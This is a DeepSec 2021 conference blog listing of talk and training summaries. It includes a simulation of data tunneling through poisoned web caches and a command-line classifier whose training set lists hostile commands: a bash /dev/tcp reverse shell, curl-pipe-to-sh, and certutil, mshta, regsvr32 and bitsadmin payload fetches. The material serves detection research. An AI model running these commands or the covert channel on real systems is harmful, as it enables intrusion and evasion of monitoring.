DeepSec 2021 Talk: I Will Hide, You Come And Seek – Discovering The Unknown in Known Malwares using Memory Forensics – Shyam Sundar Ramaswami

Sanna/ September 27, 2021/ Conference

Malware analysis is a key phase for extracting IOCs like domains, IPs, mutexes and other signatures. What if the malware knows what online sandboxes and analysis tools look for, decides to “showcase only 90%” and hides the rest? Well, memory forensics comes to our rescue. This was tried and tested with a lot of samples during the pandemic and helped in extracting many hidden processes, domains, URLs and even IPs. This is what the talk covers: the traditional malware analysis process; an introduction to memory forensics and why it is needed; tools like Volatility and Rekall; running the Orcus RAT, Agent Tesla and Sodinokibi ransomware using traditional methods like the Any.run online sandbox and malware runs; playing a game by capturing memory of the infected machine by invoking the WMI module and

Read More

DeepSec 2021 Talk: Do you have a PlugX? Artem Artemov, Rustam Mirkasymov

Sanna/ September 24, 2021/ Conference

A deep overview of a tool used by Chinese nation-state APTs, based on a real-life incident response case at a big industrial company. The investigation yielded the presence of PlugX in the infrastructure. This presentation gives a full overview of the tool's functionality, its past versions and its present-day usage (Thor is a new version of PlugX). We show why it is hard to find and why it is important for big industrial companies. We also talk about our assumption that all recent big attacks, first Sunburst and then the Exchange exploits (ProxyLogon, related to Hafnium), are links of one chain. We asked Artem and Rustam a few more questions about their talk. Please tell us the top 5 facts about your talk. It’s about pro-government APT. The described threat is silent. The threat target is

Read More

DeepSec 2021 Press Release: DeepSec and DeepINTEL Publish Conference Program

Sanna/ September 23, 2021/ Conference, DeepIntel, Press

IT security has a lot of catching up to do; digitization rests on an insecure foundation. The COVID-19 pandemic will celebrate its second birthday next year. Our everyday life has become more dependent on digital tools and platforms. If you want to rely on the convenience of the digital world, data and communication must not be threatened by weak points. Unfortunately, this is not the case, which is why the annual DeepSec IT security conference will again address threats to companies and authorities this year.

Expectations

Digitization is largely viewed uncritically as a metaphorical bringer of salvation. It should make work easier, make information more accessible, reduce administration and, in principle, solve or at least reduce problems in every area. The term Artificial Intelligence is often used when promoting the future. In the key

Read More

Hardware Security – Hacking on the Layer 1 – Training and Conference

René Pfeiffer/ September 20, 2021/ Conference

In system administration there is an easy way to distinguish between software and hardware: hardware is the part that can be kicked. This usually happens when things break. Since breaking things is a major part of security research, we have teamed up with the Hardwear.io Security Conference. The Spectre and Meltdown bugs have shown that hardware is a crucial part of everyone’s security architecture. Few software developers realise that this foundation can cause a lot of havoc. So we recommend checking out the schedule. Reverse engineering hardware can be very rewarding, because you learn a lot about how it reacts to perturbations. There will be a training at Hardwear.io on how to do this with cellular baseband firmware. This piece of code sits on the gateway to the mobile network. During the training you

Read More

DeepSec 2021 Talk: Revenge is Best Served over IOT – Chris Kubecka

Sanna/ September 17, 2021/ Conference

Welcome to the new Cold War in the Middle East. In 2012, Iran’s first Shamoon attacks almost crashed every world economy, nearly bringing the world to its knees. Since then, the game of spy vs. spy has intensified digitally, with the pandemic accelerating connectivity. Join Chris on a 2.5-year Iranian espionage campaign attempting to recruit her for the most innocent of jobs: teaching critical infrastructure hacking with a focus on nuclear facilities. A journey of old-school espionage with a cyber twist. Bribery, sockpuppets, recruitment handlers, a propaganda VVIP luxury trip mixed with a little IoT camera revenge and 2021 police protection. We asked Chris a few more questions about her talk. Please tell us the top 5 facts about your talk. Our skills as ethical hackers are in high demand, especially by sanctioned

Read More

DeepSec 2021 Presentation: Don’t get Hacked, get AMiner! Smart Log Data Analytics for Incident Detection – Florian Skopik, Markus Wurzenberger, Max Landauer

Sanna/ September 13, 2021/ Conference, Security

“Prevention is ideal, but detection is a must”. Active monitoring and intrusion detection systems (IDS) are the backbone of every effective cyber security framework. Whenever carefully planned, implemented and executed preventive security measures fail, IDS are a vital part of the last line of defence. IDS are an essential measure to detect the first steps of an attempted intrusion in a timely manner. This is a prerequisite to avoid further harm. It is commonly agreed that active monitoring of networks and systems and the application of IDS are a vital part of the state of the art. Usually, findings of IDS, as well as major events from monitoring, are forwarded to, managed and analyzed with SIEM solutions. These security information and event management solutions provide a detailed view on the status of an infrastructure

Read More

Translated Article: New ETSI Standard for Reporting Security Vulnerabilities

Sanna/ September 9, 2021/ Stories

Neuer ETSI-Standard zur Meldung von Sicherheitslücken by Erich Moechel for fm4.ORF.at. The European Telecommunications Standards Institute (ETSI), previously known more for standardizing back doors for surveillance authorities than for IT security, is now concerned with finding non-standardized security vulnerabilities. Late, but still: the discovery of ever new critical security holes in industrial IT equipment has finally woken up ETSI. The public review period for an ETSI specification that is intended to standardize the process of reporting security vulnerabilities by third parties runs until September 15. Since the introduction of LTE (4G), the standards of the IT world have increasingly applied to the formerly proprietary networks of the telecoms. This specification takes this into account by standardizing important IT security processes for the world of telecommunications. However,

Read More

DeepSec 2021 Training: Advanced Deployment and Architecture for Network Traffic Analysis – Peter Manev & Eric Leblond

Sanna/ September 6, 2021/ Training

The foundation for effective intrusion detection and response is proper sensor placement and configuration. Sensor placement is crucial for developing a comprehensive network security and monitoring solution. Misconfigurations and improper placement can lead to gaps in network visibility, which can allow attackers to go undetected for prolonged periods of time and to penetrate deeper into your network. In Advanced Deployment and Architecture for Network Traffic Analysis, you will learn the skills necessary to successfully design, deploy and optimize a high-performance network monitoring and security solution. Filled with hands-on exercises and comprehensive demonstrations, this class will elevate your skills to maximize your network visibility and data management with Suricata. By the end of this course you will have gained a deep technical understanding and hands-on experience with Suricata’s versatile arsenal of features

Read More

DeepSec 2021 Talk: Real-Time Deep Packet Inspection Intrusion Detection System for Software Defined 5G Networks – Dr. Razvan Bocu

Sanna/ September 2, 2021/ Conference

The world of the Internet of Things is becoming fundamental for the envisioned always-connected human society. 5G data networks are expected to dramatically improve on the real-world importance of existing 4G networks, which makes them particularly necessary for the next generation of IoT device networks. This talk reports the authors' experience, acquired during the implementation of the Vodafone Romania 5G networked services. This blog post about our talk describes a machine learning-based real-time intrusion detection system which has been effectively tested in the context of a 5G data network. The system is based on the creation of software-defined networks, and it uses artificial intelligence-based models for the deep inspection of the transferred data packets. It is able to detect unknown intrusions through the usage of machine learning-based software

Read More

DeepSec 2021 Training: Mobile Security Testing Guide Hands-On – Sven Schleier

Sanna/ September 1, 2021/ Training

LIVE ONLINE TRAINING [Note: This training will be completely remote. This allows you to better plan your workshop commitments when booking tickets. You can also buy a ticket for just attending this training (without access to the conference). In that case please write an e-mail to speaker@deepsec.net] Mobile apps are omnipresent in our lives and we are using more and more apps to support us, ranging from simple to complex daily tasks. Even though modern mobile operating systems like iOS and Android offer great functionality to secure data storage and communication, it has to be used correctly in order to be effective. Data storage, inter-app communication, proper usage of cryptographic APIs and secure network communication are only some of the aspects that require careful consideration. The OWASP Mobile Security Testing Guide (MSTG) is a comprehensive manual

Read More

DeepSec 2021 Talk: Web Cache Tunneling – Justin Ohneiser

Sanna/ August 31, 2021/ Conference

By using cache poisoning to store arbitrary data, we can use public web caches as open ephemeral storage to facilitate anonymous and evasive communication between network clients. We asked Justin a few more questions about his talk. Please tell us the top facts about your talk. Public web caches, when improperly configured, can be used as open ephemeral storage. Combined with a synchronization technique, this ephemeral storage can be used to tunnel arbitrary data between network clients. Tunneling data in this manner requires no listening service, as all endpoints behave as clients to the web cache server, allowing trivial use of anonymizing protocols. The conditions for this technique are present on several extremely popular websites, and the use of this technique by malware could make network detection nearly impossible. How did you come up
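
A small simulation of the mechanism described above, added here as an illustration; it is not code from the talk or from the speaker. It models a hypothetical shared cache that keys only on the URL path while the origin reflects an unkeyed request header (X-Forwarded-Host) into the response body. The writer stores base32-encoded chunks of a message by poisoning one path per chunk; the reader issues plain GETs for the same paths and recovers the data. The cache, origin, hostnames (drop.example, origin.example) and path scheme are all constructed for the example; the payload is made up.

```python
import base64
import re
import time
from dataclasses import dataclass, field


@dataclass
class Origin:
    """Hypothetical origin: it builds an absolute link from the X-Forwarded-Host
    request header. The cache does not key on that header (the misconfiguration)."""

    def handle(self, path: str, headers: dict) -> str:
        host = headers.get("X-Forwarded-Host", "origin.example")
        return f'<a href="https://{host}{path}">canonical</a>'


@dataclass
class Cache:
    """Shared web cache keyed on the path only. Entries expire after ttl seconds."""

    origin: Origin
    ttl: float = 60.0
    store: dict = field(default_factory=dict)  # path -> (body, expires_at)

    def get(self, path: str, headers=None, now=None):
        now = time.time() if now is None else now
        hit = self.store.get(path)
        if hit is not None and hit[1] > now:
            return hit[0], True  # served from cache, request headers ignored
        body = self.origin.handle(path, headers or {})
        self.store[path] = (body, now + self.ttl)
        return body, False


CHUNK = 30  # 30 bytes -> 48 base32 chars, fits in one DNS label (max 63)
# Only poisoned bodies carry the constructed drop.example suffix.
LINK = re.compile(r'href="https://([a-z2-7]+)\.drop\.example')


def send(cache: Cache, session: str, data: bytes, now=None) -> int:
    """Writer: poison /t/<session>/<seq> with one chunk per path, then an
    'end' marker. Returns the number of data chunks written."""
    chunks = [data[i:i + CHUNK] for i in range(0, len(data), CHUNK)]
    for seq, chunk in enumerate(chunks):
        label = base64.b32encode(chunk).decode().rstrip("=").lower()
        cache.get(f"/t/{session}/{seq}",
                  {"X-Forwarded-Host": f"{label}.drop.example"}, now)
    cache.get(f"/t/{session}/{len(chunks)}",
              {"X-Forwarded-Host": "end.drop.example"}, now)
    return len(chunks)


def receive(cache: Cache, session: str, now=None) -> bytes:
    """Reader: plain GETs with no special headers. Stops at the 'end' marker,
    at a slot that is not cached, or at a slot that holds an unpoisoned body."""
    out, seq = b"", 0
    while True:
        body, hit = cache.get(f"/t/{session}/{seq}", now=now)
        m = LINK.search(body)
        if not hit or m is None or m.group(1) == "end":
            return out
        label = m.group(1).upper()
        out += base64.b32decode(label + "=" * (-len(label) % 8))
        seq += 1


if __name__ == "__main__":
    cache = Cache(Origin(), ttl=60.0)
    msg = b"beacon-id=7; task=sleep 300; " * 3  # constructed payload, 87 bytes
    send(cache, "s1", msg)
    print(receive(cache, "s1") == msg)
```

Neither side ever runs a listener: both only issue GET requests, which is why the talk notes the endpoints can sit behind ordinary anonymizing clients. The simulation also shows why a synchronization technique is needed: if the reader polls a slot before the writer has poisoned it, the cache stores the clean origin response for that path and the writer's chunk is refused until the entry expires, so the channel is lost for one TTL.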

Read More

DeepSec 2021 Training: Mobile Network Operations and Security – David Burgess

Sanna/ August 30, 2021/ Conference

This workshop describes security risks in mobile networks, both in the core network and in the radio network, based on case studies reported in the press. For each case, we will dig into the technical elements of what actually happened. The workshop will be especially useful for IT security people who are responsible for mobile devices but are not yet familiar with mobile network technology. The material will also be useful for anyone who works with individuals who have special security concerns, or who report on telecom security topics. The workshop will start with an overview of cellular technology in general and types of security flaws common to all mobile networks, and then proceed to specific examples for different network segments and technology types. The workshop will include demonstrations of some security failures and

Read More

DeepSec 2021 Talk: Those Among Us – The Insider Threat facing Organizations – Robert Sell

Sanna/ August 27, 2021/ Conference

Organizations spend a considerable amount of time and money protecting themselves from external threats while practically ignoring the significant threats from within. Cybercrime had an estimated cost of $2 trillion in 2019, with an average cost per data breach of $3.9 million. This global cost is expected to grow to $6 trillion annually by 2021. In 2018, 34% of data breaches involved internal factors, and this trend continues to grow. This hard-on-the-outside, soft-in-the-middle approach by information security departments leaves organizations susceptible to a variety of insider threats that could be avoided. In this talk, I will present the extent of the issue, the types of insider threats to expect and how organizations can mitigate these risks. We asked Robert a few more questions about his talk.

Read More

DeepSec 2021 Talk: How to Choose your Best API Protection Tool? Comparison of AI Based API Protection Solutions – Vitaly Davidoff

Sanna/ August 26, 2021/ Conference

As the world becomes more and more connected, application security becomes an important concern, especially in the Internet of Things (IoT), Application Programming Interface (API) and microservices spaces. In addition, proper access management needs to be seriously addressed to ensure company assets are securely distributed and deployed. There are many tools on the market providing AI-based API protection and anomaly detection, but what really works? How do you choose the best solution? During my talk, I will share results from research reviewing the different architecture approaches and AI solutions introduced by popular tools on the market, from WAFs to workload protection systems. We asked Vitaly a few more questions about his talk. 1) Please tell us the top facts about your talk. This talk is a first try to dive deep

Read More

DeepSec 2021 Talk: Hunting for LoLs (a ML Living of the Land Classifier) – Tiberiu Boros, Andrei Cotaie

Sanna/ August 25, 2021/ Conference

Living off the Land is not a brand-new concept. The knowledge and resources have been out there for several years now. Still, LoL is one of the preferred approaches when we are speaking about highly skilled attackers or security professionals. There are two main reasons for this: experts tend not to reinvent the wheel, and attackers like to keep a low profile/footprint (no random binaries/scripts on the disk). This talk focuses on detecting attacker activity/Living off the Land commands using Machine Learning, for both Linux and Windows systems. Most AV vendors do not treat the command itself (from a syntax and vocabulary perspective) as an attack vector. And most of the log-based alerts are static, have a limited scope and are hard to update. Furthermore, classic LoL detection mechanisms are noisy and somewhat
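
To make concrete what treating "the command itself, from a syntax and vocabulary perspective" as the feature means, here is an added baseline: a multinomial Naive Bayes classifier over lexical tokens of command lines. It is not the classifier from the talk and uses none of its data; the tokenizer, the "lol"/"benign" labels and every training command line below are constructed for this example, and the IP addresses are from the 203.0.113.0/24 documentation range. Binaries keep their extension, flags keep their leading "-", "--" or "/", and purely numeric tokens (IPs, ports) are dropped, so the model keys on vocabulary and syntax rather than on indicators.

```python
import math
import re
from collections import Counter

# Lexical tokens: binaries with extension (certutil.exe), flags with their
# prefix (-urlcache, --oneline, /transfer), path components (/dev, /tcp).
# Digit-only runs such as IPs and ports are not matched and so are dropped.
TOKEN = re.compile(r"(?:--|[-/])?[a-z][a-z0-9]*(?:\.[a-z]+)?")


def tokenize(cmd: str) -> list:
    return TOKEN.findall(cmd.lower())


class CommandNB:
    """Multinomial Naive Bayes with Laplace smoothing over command tokens."""

    def __init__(self, alpha: float = 1.0):
        self.alpha = alpha
        self.docs = Counter()   # label -> number of training commands
        self.tok = {}           # label -> Counter of tokens
        self.total = Counter()  # label -> total token count
        self.vocab = set()

    def fit(self, samples):
        for cmd, label in samples:
            self.docs[label] += 1
            counts = self.tok.setdefault(label, Counter())
            for t in tokenize(cmd):
                counts[t] += 1
                self.total[label] += 1
                self.vocab.add(t)
        return self

    def scores(self, cmd: str) -> dict:
        """Log posterior (up to a constant) for each label."""
        n, v = sum(self.docs.values()), len(self.vocab)
        out = {}
        for label, d in self.docs.items():
            s = math.log(d / n)
            for t in tokenize(cmd):
                s += math.log((self.tok[label][t] + self.alpha)
                              / (self.total[label] + self.alpha * v))
            out[label] = s
        return out

    def predict(self, cmd: str) -> str:
        s = self.scores(cmd)
        return max(s, key=s.get)


# Constructed training data (hypothetical, not a real corpus).
TRAINING = [
    ("certutil.exe -urlcache -split -f http://203.0.113.5/a.txt a.txt", "lol"),
    ("powershell -nop -w hidden -enc aQBlAHgA", "lol"),
    ("mshta http://203.0.113.5/p.hta", "lol"),
    ("regsvr32 /s /n /u /i:http://203.0.113.5/x.sct scrobj.dll", "lol"),
    ("bitsadmin /transfer j /download /priority high http://203.0.113.5/b.exe "
     "c:\\users\\public\\b.exe", "lol"),
    ("curl -s http://203.0.113.5/s.sh | sh", "lol"),
    ("bash -i >& /dev/tcp/203.0.113.5/4444 0>&1", "lol"),
    ("wmic process call create powershell -w hidden", "lol"),
    ("git status", "benign"),
    ("ls -la /var/log", "benign"),
    ("powershell Get-ChildItem C:\\Users", "benign"),
    ("certutil -verify cert.cer", "benign"),
    ("notepad.exe report.docx", "benign"),
    ("python3 manage.py runserver", "benign"),
    ("systemctl restart nginx", "benign"),
    ('regsvr32 /s "c:\\program files\\app\\comlib.dll"', "benign"),
    ("curl -s https://api.internal/health", "benign"),
]


def build_model() -> CommandNB:
    return CommandNB().fit(TRAINING)


if __name__ == "__main__":
    model = build_model()
    for cmd in ("mshta http://203.0.113.9/x.hta", "ls -la /etc", "powershell -w hidden"):
        print(f"{model.predict(cmd):7s}  {cmd}")
```

The tokens that move a score are things like "-urlcache", "-w hidden" or "/tcp", not the download host, so the same binary ("certutil", "regsvr32", "curl") can appear in both classes and be separated by its arguments. On a real corpus the class priors and the smoothing constant dominate how noisy the classifier is, which is the trade-off the talk refers to.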

Read More